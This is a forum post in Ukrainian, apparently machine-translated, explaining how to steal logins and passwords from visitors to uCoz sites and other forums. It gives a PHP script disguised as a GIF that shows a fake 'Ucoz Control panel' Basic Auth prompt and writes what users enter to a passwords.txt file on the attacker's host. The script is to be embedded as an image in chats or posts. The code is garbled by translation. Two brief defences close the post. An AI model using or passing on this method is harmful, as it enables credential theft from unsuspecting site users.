Інформація - поговоримо як зламати сайт на Юкоз і не тільки, ру-сфера дослідження захисту і

Так і не зміг знайти, тут це вже обговорювалося, Антіохії навіть демонстрував цю атаку тут на форумі, але на одному хак. ресурсі попалася цікава інфа, як "Відірватися" на Юкоз, хоча даний метод можна застосовувати майже на будь-якому форумі.

Отже більш детальніше на прикладі Юкоз (Але можете спробувати і на форумах, додавши зазначену картинку в підпис або в пост / чат наприклад):

Для початку потрібно зареєструвати хостинг з підтримкою php (наприклад Бегета, Хотингера, не важливо).

Після реєстрації ллємо на фтп скрипт і ставимо права 777 на порожній .txt файл, наприклад. passwords.txt (сюди будуть надсилатися паси користувачів "похаканного" сайту).

Потім відкрийте блокнот, та простий блокнот і напишіть наступне:

header ( "Content-type: image / gif");
$ Image = imagecreatefromgif ( 'cool.gif');
if (! $ _COOKIE [ 'LOGON'])
$ Login = $ _SERVER [ 'PHP_AUTH_USER'];
$ Pass = $ _SERVER [ 'PHP_AUTH_PW'];
if (strlen ($ pass) <= 4 ||. $login )
Header ( 'HTTP / 1.1 401 Unauthorized');
Header ( 'WWW-Authenticate: Basic realm = "Ucoz Control panel"');
>
elseif ($ login)
setcookie ( 'LOGON'. md5 ($ pass));
$ F = fopen ( 'passwords.txt'. 'Ab');
fwrite ($ f. $ login. "|||". $ pass. "\ r \ n");
fclose ($ f);
>
>
imagegif ($ image);
imagedestroy ($ image);
?>

Як тільки ви напишіть все - збережіть файл під назвою smile, потім поміняйте розширення на php і залийте на хостинг, наприклад smile.php (Незабудьте виставити права 777 або 755).

Тепер вибирайте будь-який юкозовскій сайт, зліва юкозовскіх сайтів як зазвичай, у більшості є міні-чат справа.

Так ось - для початку зарегістіруйтесь на сайті, потім в міні чаті напишіть логін, а в змісті повідомлення напишіть наступне:

Після цього у всіх хто буде заходити на дану сторінку, буде з'являтися форма в яку потрібно буде ввести логін і пароль. У вас при вході на сайт така форма буде з'являтися теж. І все, введені логіни і паролі в цю форму будуть отсилатся в порожній файл passwords.txt, який ви створили в самому початку і залили на фтп.

ТЕЖ застосовні і для ФОРУМІВ, І БЛОГІВ, ДЕ ДОЗВОЛЕНО ВСТАВКА КАРТИНОК СО ТРЕТІХ РЕСУРСІВ!

Способи захисту:

1) Відключити вставку картинок зі сторонніх ресурсів;

2) Зробити проксінг картинок до себе на сервер.

У мене все, до речі якщо знайдете тему де це обговорювалося вже тут, запостив в цій темі, для доп. інформації.